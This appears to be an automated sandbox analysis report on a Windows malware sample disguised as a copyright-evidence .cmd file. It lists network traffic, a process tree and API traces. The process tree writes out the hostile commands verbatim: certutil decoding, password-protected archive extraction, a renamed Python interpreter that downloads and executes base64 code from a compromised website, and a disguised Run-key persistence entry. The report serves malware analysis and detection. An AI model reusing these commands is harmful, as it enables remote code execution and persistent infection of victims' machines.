                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.831861973 CET49707443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.831999063 CET49707443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.138880014 CET5200753192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.592272043 CET53520071.1.1.1192.168.2.16
                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.138880014 CET192.168.2.161.1.1.10x9874Standard query (0)www.aviationchartersolutions.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.592272043 CET1.1.1.1192.168.2.160x9874No error (0)www.aviationchartersolutions.comcpanel119.turbify.bizCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.592272043 CET1.1.1.1192.168.2.160x9874No error (0)cpanel119.turbify.biz52.0.145.89A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:10:25:18
                                                                                                                                                                                                                                  Start date:20/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff648d50000
                                                                                                                                                                                                                                  File size:71'680 bytes
                                                                                                                                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                  Start time:10:25:33
                                                                                                                                                                                                                                  Start date:20/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Copyright Infringement Evidence - Images and Videos.cmd" "
                                                                                                                                                                                                                                  Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                  Start time:10:25:33
                                                                                                                                                                                                                                  Start date:20/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                  Start time:10:25:33
                                                                                                                                                                                                                                  Start date:20/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\certutil.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:certutil -decode DzbIZ1HRMj DzbIZ1HRMj.rar
                                                                                                                                                                                                                                  Imagebase:0x7ff75f6d0000
                                                                                                                                                                                                                                  File size:1'651'712 bytes
                                                                                                                                                                                                                                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                  Start time:10:25:36
                                                                                                                                                                                                                                  Start date:20/12/2024
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:Rar x -pAnfoE5FeC6R5dPfRbxQgKMtZdV6v0OKC -inul -y DzbIZ1HRMj.rar C:\Users\Public\M20EKMMEH2
                                                                                                                                                                                                                                  Imagebase:0x7ff75f760000
                                                                                                                                                                                                                                  File size:644'184 bytes
                                                                                                                                                                                                                                  MD5 hash:01F28B85ABF1993B7B14B3D15346F2E8
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                  Start time:10:25:49
                                                                                                                                                                                                                                  Start date:20/12/2024
                                                                                                                                                                                                                                  Path:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))"
                                                                                                                                                                                                                                  Imagebase:0x550000
                                                                                                                                                                                                                                  File size:100'120 bytes
                                                                                                                                                                                                                                  MD5 hash:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                  Start time:10:25:49
                                                                                                                                                                                                                                  Start date:20/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\certutil.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"
                                                                                                                                                                                                                                  Imagebase:0x7ff75f6d0000
                                                                                                                                                                                                                                  File size:1'651'712 bytes
                                                                                                                                                                                                                                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                  Start time:10:25:49
                                                                                                                                                                                                                                  Start date:20/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f
                                                                                                                                                                                                                                  Imagebase:0x7ff714240000
                                                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                  Start time:10:26:05
                                                                                                                                                                                                                                  Start date:20/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Security.bat" "
                                                                                                                                                                                                                                  Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                  Start time:10:26:05
                                                                                                                                                                                                                                  Start date:20/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                  Start time:10:26:05
                                                                                                                                                                                                                                  Start date:20/12/2024
                                                                                                                                                                                                                                  Path:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))"
                                                                                                                                                                                                                                  Imagebase:0x550000
                                                                                                                                                                                                                                  File size:100'120 bytes
                                                                                                                                                                                                                                  MD5 hash:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:3.6%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                    Signature Coverage:4.6%
                                                                                                                                                                                                                                    Total number of Nodes:393
                                                                                                                                                                                                                                    Total number of Limit Nodes:57
                                                                                                                                                                                                                                    execution_graph 72932 6cb04dd0 72935 6cb04e0a 72932->72935 72933 6cb04f22 SetErrorMode 72934 6cb04f4f SetErrorMode 72933->72934 72937 6cb04fa4 72933->72937 72934->72937 72935->72933 72935->72937 72576 6cb27f90 72579 6cb27790 72576->72579 72580 6cb277c0 72579->72580 72581 6cb27865 72580->72581 72582 6ca47490 VirtualAlloc 72580->72582 72582->72580 72683 6ca40760 72684 6ca40773 72683->72684 72685 6ca407bd 72684->72685 72687 6c9c2590 72684->72687 72690 6c9c2400 72687->72690 72691 6c9c241d GetTimeZoneInformation 72690->72691 72693 6c9c24f6 72691->72693 72693->72684 72694 6ca504e0 72695 6ca504f0 72694->72695 72696 6ca4d2d0 VirtualAlloc 72695->72696 72697 6ca50511 72695->72697 72696->72697 72583 6ca72200 72584 6ca72213 72583->72584 72585 6ca72311 72584->72585 72587 6ca476e0 72584->72587 72588 6ca47718 72587->72588 72589 6ca477c5 72588->72589 72592 6ca46280 VirtualFree 72588->72592 72589->72585 72590 6ca477b4 72590->72585 72592->72590 72938 6ca98e40 72939 6ca98e6b 72938->72939 72940 6ca98e77 72939->72940 72942 6ca94250 72939->72942 72945 6ca94160 72942->72945 72944 6ca9427a 72944->72940 72946 6ca94173 72945->72946 72946->72946 72947 6ca9419c 72946->72947 72948 6ca47621 VirtualAlloc 72946->72948 72947->72944 72948->72947 72593 6c9ab030 72594 6c9ab06b 72593->72594 72596 6c9ab0b3 72594->72596 72597 6c9ab810 72594->72597 72598 6c9ab834 72597->72598 72599 6c9ab889 AddDllDirectory 72598->72599 72600 6c9ab894 72598->72600 72599->72600 72600->72596 72601 6c9a5d30 72604 6c9a5d5d 72601->72604 72603 6c9a5e2c 72604->72603 72605 6c9a2830 72604->72605 72606 6c9a284f 72605->72606 72607 6c9a28da 72606->72607 72608 6c9a28d3 72606->72608 72610 6c9a2855 72606->72610 72612 6c9a28ba 72606->72612 72619 6c9a22d0 CreateFileW GetFileType GetFileInformationByHandle CloseHandle 72607->72619 72616 6c9a22f0 72608->72616 72610->72603 72614 6c9a292a 72612->72614 72615 6cb06570 FormatMessageW 72612->72615 72613 6c9a2916 72613->72603 72614->72603 72615->72613 72620 6c9a1d90 CreateFileW 72616->72620 72618 6c9a22f8 72618->72612 72619->72612 72621 6c9a200f GetFileType 72620->72621 72623 6c9a1e02 72620->72623 72625 6c9a209b 72621->72625 72626 6c9a1e1d 72621->72626 72622 6c9a2165 GetFileInformationByHandle 72622->72626 72623->72621 72623->72626 72627 6c9a1f48 72623->72627 72624 6c9a2241 CloseHandle 72624->72627 72625->72622 72625->72626 72628 6c9a2135 72625->72628 72626->72624 72626->72627 72627->72618 72628->72618 72698 6c9a6750 72699 6c9a6776 72698->72699 72700 6c9a688e 72699->72700 72702 6c9a2d20 72699->72702 72703 6c9a2d4c 72702->72703 72704 6c9a2e5a FindFirstFileW 72703->72704 72705 6c9a2d77 72703->72705 72704->72705 72709 6c9a2e79 72704->72709 72705->72700 72706 6c9a3040 FindNextFileW 72706->72709 72707 6c9a30cf FindClose 72707->72705 72708 6c9a3080 72707->72708 72708->72705 72708->72707 72709->72705 72709->72706 72709->72708 72710 6cafa363 72713 6caf6880 72710->72713 72712 6cafa36e 72714 6caf68c3 72713->72714 72734 6caf6afb 72714->72734 72744 6caf61d0 72714->72744 72721 6caf65b0 VirtualAlloc 72723 6caf693c 72721->72723 72722 6caf6963 72724 6caf65b0 VirtualAlloc 72722->72724 72722->72734 72723->72722 72725 6caf6530 VirtualAlloc 72723->72725 72723->72734 72727 6caf697c 72724->72727 72725->72722 72726 6caf69a3 72726->72734 72762 6caf6530 72726->72762 72727->72726 72729 6caf6530 VirtualAlloc 72727->72729 72727->72734 72729->72726 72732 6caf6a00 72732->72734 72772 6caf5f80 VirtualAlloc 72732->72772 72734->72712 72735 6caf6b26 72735->72734 72736 6caf4af0 VirtualAlloc 72735->72736 72737 6caf6bc5 72735->72737 72736->72735 72737->72734 72738 6caf6c82 72737->72738 72740 6caf6c33 72737->72740 72739 6caf5230 VirtualAlloc 72738->72739 72743 6caf6c95 72739->72743 72740->72734 72773 6caf5320 VirtualAlloc 72740->72773 72742 6caf6cff 72742->72712 72743->72712 72745 6caf628e 72744->72745 72747 6caf61eb 72744->72747 72745->72734 72748 6caf6660 72745->72748 72747->72745 72774 6cafd810 72747->72774 72749 6caf66bc 72748->72749 72753 6caf667a 72748->72753 72750 6caf66f9 72749->72750 72875 6caf62b0 VirtualAlloc 72749->72875 72750->72734 72756 6caf65b0 72750->72756 72752 6caf669b 72755 6caf4af0 VirtualAlloc 72752->72755 72753->72749 72753->72750 72753->72752 72754 6cafe2d0 VirtualAlloc 72753->72754 72754->72753 72755->72749 72759 6caf65c5 72756->72759 72757 6caf6643 72757->72721 72757->72734 72759->72757 72761 6cafe2d0 VirtualAlloc 72759->72761 72876 6caf51c0 VirtualAlloc 72759->72876 72877 6caf64d0 VirtualAlloc 72759->72877 72761->72759 72763 6caf6583 72762->72763 72764 6caf6540 72762->72764 72763->72732 72763->72734 72771 6caf5320 VirtualAlloc 72763->72771 72764->72763 72878 6caf51c0 VirtualAlloc 72764->72878 72766 6caf658f 72770 6cafe2d0 VirtualAlloc 72766->72770 72767 6caf657e 72879 6caf64d0 VirtualAlloc 72767->72879 72768 6caf655a 72768->72763 72768->72766 72768->72767 72770->72763 72771->72732 72772->72735 72773->72742 72775 6cafd829 72774->72775 72810 6cafd85e 72774->72810 72776 6cafda6f 72775->72776 72777 6cafd956 72775->72777 72778 6cafda05 72775->72778 72779 6cafdb04 72775->72779 72780 6cafd830 72775->72780 72781 6cafdb10 72775->72781 72795 6cafdb95 72775->72795 72797 6cafdbf8 72775->72797 72800 6cafda7b 72775->72800 72814 6cafd863 72775->72814 72824 6caf7d70 VirtualAlloc 72776->72824 72786 6cafe2d0 VirtualAlloc 72777->72786 72783 6cafe2d0 VirtualAlloc 72778->72783 72864 6cafb680 VirtualAlloc 72779->72864 72819 6cafe2d0 72780->72819 72865 6cafad80 VirtualAlloc 72781->72865 72806 6cafd970 72783->72806 72788 6cafd95e 72786->72788 72798 6cafe2d0 VirtualAlloc 72788->72798 72818 6cafd933 72788->72818 72789 6cafdb28 72789->72747 72792 6cafda74 72792->72747 72794 6cafdb09 72794->72747 72795->72818 72866 6cafcec0 VirtualAlloc 72795->72866 72796 6cafdbee 72796->72747 72797->72818 72867 6cafcec0 VirtualAlloc 72797->72867 72798->72806 72800->72818 72825 6caf78a0 72800->72825 72801 6cafd885 72803 6cafe2d0 VirtualAlloc 72801->72803 72802 6cafd84c 72807 6cafe2d0 VirtualAlloc 72802->72807 72802->72818 72803->72818 72804 6cafe2d0 VirtualAlloc 72804->72814 72806->72818 72823 6caf4e20 VirtualAlloc 72806->72823 72807->72810 72809 6cafdaa9 72811 6cafe2d0 VirtualAlloc 72809->72811 72809->72818 72810->72747 72813 6cafdabe 72811->72813 72812 6caf4af0 VirtualAlloc 72812->72814 72813->72818 72863 6caf53d0 VirtualAlloc 72813->72863 72814->72801 72814->72804 72814->72812 72814->72818 72816 6cafdace 72817 6cafe2d0 VirtualAlloc 72816->72817 72816->72818 72817->72818 72818->72747 72820 6cafd810 VirtualAlloc 72819->72820 72821 6cafd838 72820->72821 72821->72818 72822 6caf4e20 VirtualAlloc 72821->72822 72822->72802 72823->72810 72824->72792 72826 6caf78ef 72825->72826 72827 6caf78b9 72825->72827 72829 6cafe2d0 VirtualAlloc 72826->72829 72827->72826 72828 6caf7a63 72827->72828 72833 6caf78f4 72827->72833 72836 6caf79ba 72827->72836 72828->72826 72831 6caf7aa3 72828->72831 72830 6caf7cde 72829->72830 72832 6caf4af0 VirtualAlloc 72830->72832 72848 6caf798c 72830->72848 72840 6cafe2d0 VirtualAlloc 72831->72840 72831->72848 72832->72848 72835 6caf78a0 VirtualAlloc 72833->72835 72839 6caf7977 72833->72839 72833->72848 72834 6caf78a0 VirtualAlloc 72834->72848 72835->72833 72837 6caf78a0 VirtualAlloc 72836->72837 72836->72848 72838 6caf79e8 72837->72838 72841 6caf78a0 VirtualAlloc 72838->72841 72838->72848 72839->72834 72846 6caf7ad0 72840->72846 72842 6caf7a03 72841->72842 72842->72848 72868 6caf53d0 VirtualAlloc 72842->72868 72844 6cafe2d0 VirtualAlloc 72844->72846 72845 6caf7a16 72847 6caf78a0 VirtualAlloc 72845->72847 72845->72848 72846->72844 72846->72848 72850 6caf4af0 VirtualAlloc 72846->72850 72851 6caf7be9 72846->72851 72869 6caf7720 VirtualAlloc 72846->72869 72847->72848 72848->72809 72850->72846 72852 6cafe2d0 VirtualAlloc 72851->72852 72853 6caf7bfd 72852->72853 72853->72848 72870 6caf7720 VirtualAlloc 72853->72870 72855 6caf7c12 72855->72848 72871 6caf5380 VirtualAlloc 72855->72871 72857 6caf7c31 72857->72848 72872 6caf53d0 VirtualAlloc 72857->72872 72859 6caf7c70 72859->72848 72873 6caf4e20 VirtualAlloc 72859->72873 72861 6caf7c96 72861->72848 72874 6caf53d0 VirtualAlloc 72861->72874 72863->72816 72864->72794 72865->72789 72866->72796 72867->72810 72868->72845 72869->72846 72870->72855 72871->72857 72872->72859 72873->72861 72874->72848 72875->72750 72876->72759 72877->72759 72878->72768 72879->72763 72949 6cafa4c3 72951 6cafa4ca 72949->72951 72950 6caf78a0 VirtualAlloc 72952 6cafa50d 72950->72952 72951->72950 72953 6cafa4f3 72951->72953 72952->72953 72954 6caf4af0 VirtualAlloc 72952->72954 72954->72953 72629 6c8599aa 72630 6c8599b3 72629->72630 72633 6c85981d 72630->72633 72634 6c859829 72633->72634 72635 6c859852 dllmain_raw 72634->72635 72640 6c859838 72634->72640 72641 6c85984d 72634->72641 72636 6c85986c dllmain_crt_dispatch 72635->72636 72635->72640 72636->72640 72636->72641 72637 6c8598be 72638 6c8598c7 dllmain_crt_dispatch 72637->72638 72637->72640 72639 6c8598da dllmain_raw 72638->72639 72638->72640 72639->72640 72641->72637 72642 6c8598b3 dllmain_raw 72641->72642 72642->72637 72643 6c9fed30 72644 6c9fed6b 72643->72644 72647 6c9fed41 72643->72647 72645 6c9fed8d 72644->72645 72648 6c9fec40 72644->72648 72649 6c9fec52 72648->72649 72651 6c9fec69 72648->72651 72649->72647 72650 6c9fec71 72650->72647 72651->72650 72652 6ca47490 VirtualAlloc 72651->72652 72653 6ca47621 VirtualAlloc 72651->72653 72652->72650 72653->72650 72654 6c9f5c30 72655 6c9f5c54 72654->72655 72656 6c9f5c5a 72654->72656 72655->72656 72658 6ca47190 72655->72658 72659 6ca471a1 72658->72659 72660 6ca4719d 72658->72660 72663 6ca478d1 72659->72663 72660->72656 72661 6ca471b1 72661->72656 72664 6ca478e1 72663->72664 72666 6ca47929 72663->72666 72665 6ca47490 VirtualAlloc 72664->72665 72668 6ca478eb 72665->72668 72667 6ca47490 VirtualAlloc 72666->72667 72666->72668 72667->72668 72668->72661 72955 6caf3cc0 72957 6caf3d05 72955->72957 72956 6caf3d20 72957->72956 72958 6caf407f 72957->72958 72959 6caf4134 72957->72959 72960 6caf4084 72958->72960 72963 6caf40bd 72958->72963 72965 6caf5c30 72959->72965 72960->72956 72962 6cafe2d0 VirtualAlloc 72960->72962 72962->72956 72963->72956 72964 6caf4af0 VirtualAlloc 72963->72964 72964->72956 72966 6caf5c4e 72965->72966 72967 6caf4af0 VirtualAlloc 72966->72967 72968 6caf5ca6 72966->72968 72967->72968 72969 6cafe2d0 VirtualAlloc 72968->72969 72974 6caf5d47 72968->72974 72970 6caf5d1d 72969->72970 72971 6caf5dfa 72970->72971 72973 6caf5da0 72970->72973 72970->72974 72972 6caf5230 VirtualAlloc 72971->72972 72972->72974 72973->72974 72976 6caf5320 VirtualAlloc 72973->72976 72974->72956 72976->72974 72669 6cb14580 72671 6cb1458f 72669->72671 72670 6cb145fd 72671->72670 72673 6cb146a0 72671->72673 72675 6cb146d4 72673->72675 72674 6cb146f3 72674->72670 72675->72674 72678 6ca46f30 72675->72678 72676 6cb14709 72676->72670 72679 6ca46f41 72678->72679 72680 6ca46f3d 72678->72680 72682 6ca47621 VirtualAlloc 72679->72682 72680->72676 72681 6ca46f4e 72681->72676 72682->72681 72880 6c9c6bce 72881 6c9c6be5 72880->72881 72882 6c9c6b50 72881->72882 72884 6cb09070 72881->72884 72885 6cb09099 72884->72885 72886 6cb090af 72885->72886 72887 6cb090d7 GetFileType 72885->72887 72886->72882 72888 6cb0911a 72887->72888 72890 6cb090e5 72887->72890 72889 6cb09161 GetFileInformationByHandle 72888->72889 72888->72890 72889->72890 72890->72882 72504 6cafe0bb 72507 6cafab70 72504->72507 72506 6cafe0c3 72508 6cafab92 72507->72508 72509 6cafac6a 72508->72509 72511 6cafabdc 72508->72511 72514 6cafac9b 72508->72514 72515 6caf5230 72509->72515 72511->72514 72519 6caf5320 VirtualAlloc 72511->72519 72513 6cafad4e 72513->72506 72514->72506 72516 6caf5247 72515->72516 72517 6caf524d 72516->72517 72520 6caf4af0 72516->72520 72517->72514 72519->72513 72521 6caf4b01 72520->72521 72522 6caf4b11 72520->72522 72524 6ca47490 72521->72524 72522->72517 72525 6ca4749b 72524->72525 72527 6ca474c1 72524->72527 72525->72527 72528 6ca47280 72525->72528 72527->72522 72530 6ca47291 72528->72530 72529 6ca473cf 72529->72527 72530->72529 72530->72530 72532 6ca46260 VirtualAlloc 72530->72532 72532->72529 72533 6ca50e30 72536 6ca50e43 72533->72536 72535 6ca50eca 72537 6ca50e74 72536->72537 72538 6ca4d2d0 72536->72538 72541 6ca4d2e5 72538->72541 72540 6ca4d4f9 72540->72535 72542 6ca4d500 72541->72542 72543 6ca4d5c0 72541->72543 72542->72535 72544 6ca4d5ec 72543->72544 72545 6ca4d60f 72544->72545 72547 6ca47621 72544->72547 72545->72540 72548 6ca47490 VirtualAlloc 72547->72548 72549 6ca47632 72548->72549 72549->72545 72977 6ca06f56 72978 6ca06f86 72977->72978 72979 6ca06f5a 72977->72979 72980 6ca47190 VirtualAlloc 72978->72980 72980->72979 72550 6c9a6f80 72551 6c9a6faa 72550->72551 72552 6c9a70d9 CreateDirectoryW 72551->72552 72554 6c9a70bb 72551->72554 72555 6c9a7188 72551->72555 72552->72554 72556 6c9a7572 MoveFileExW 72555->72556 72557 6c9a72f6 72555->72557 72556->72557 72891 6caaf270 72893 6caaf28f 72891->72893 72892 6caaf323 72893->72892 72895 6ca984d0 72893->72895 72896 6ca984e6 72895->72896 72897 6ca98589 72896->72897 72899 6ca98516 72896->72899 72900 6ca98592 72896->72900 72904 6ca98340 72897->72904 72899->72892 72900->72899 72901 6ca98340 VirtualAlloc 72900->72901 72902 6ca9858e 72901->72902 72902->72899 72909 6cb27000 72902->72909 72905 6ca9835b 72904->72905 72907 6ca983ea 72905->72907 72912 6ca349ee 72905->72912 72906 6ca983b9 72906->72902 72907->72902 72924 6ca2d000 72909->72924 72915 6ca34660 72912->72915 72914 6ca34a03 72914->72906 72916 6ca3468f 72915->72916 72918 6ca346d2 72916->72918 72919 6ca318e0 72916->72919 72918->72914 72920 6ca318f3 72919->72920 72921 6ca3191c 72919->72921 72920->72918 72922 6ca31937 72921->72922 72923 6ca47490 VirtualAlloc 72921->72923 72922->72918 72923->72922 72925 6ca2d034 72924->72925 72926 6ca2d016 72924->72926 72925->72899 72926->72925 72927 6ca478d1 VirtualAlloc 72926->72927 72927->72925 72928 6c9bbfc0 72930 6c9bbfce 72928->72930 72929 6c9bc018 CloseHandle 72931 6c9bc028 72929->72931 72930->72929 72930->72931 72558 6c9c8002 72559 6c9c8056 72558->72559 72560 6c9c800c 72558->72560 72559->72560 72562 6cb098a0 72559->72562 72564 6cb098d4 72562->72564 72563 6cb098e7 72563->72560 72564->72563 72565 6cb0993a 72564->72565 72568 6cb0995f 72564->72568 72572 6cb06570 72565->72572 72567 6cb09948 72567->72560 72569 6cb09a27 72568->72569 72570 6cb06570 FormatMessageW 72568->72570 72569->72560 72571 6cb09aeb 72570->72571 72571->72560 72573 6cb06597 FormatMessageW 72572->72573 72574 6cb0658f 72572->72574 72575 6cb065b7 72573->72575 72574->72573 72575->72567
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 6C9A70F3
                                                                                                                                                                                                                                    • MoveFileExW.KERNELBASE(?,?,00000001), ref: 6C9A757E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C99D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C99D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c99d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateDirectoryFileMove
                                                                                                                                                                                                                                    • String ID: path
                                                                                                                                                                                                                                    • API String ID: 3594690679-190089999
                                                                                                                                                                                                                                    • Opcode ID: 275c0cfbd4c10392f64e7e1ae08a10033231088d96be1fdd4f67d66b45324d08
                                                                                                                                                                                                                                    • Instruction ID: 8bc5b66ff0502b6de9c4461f0300a175400022df9d5ee25e1d03c5dd95613e4b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 275c0cfbd4c10392f64e7e1ae08a10033231088d96be1fdd4f67d66b45324d08
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF62F4716053019FD700CFA9DC42A5BB7B9AF85728F144B2CF96497B94EB31E846C782

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
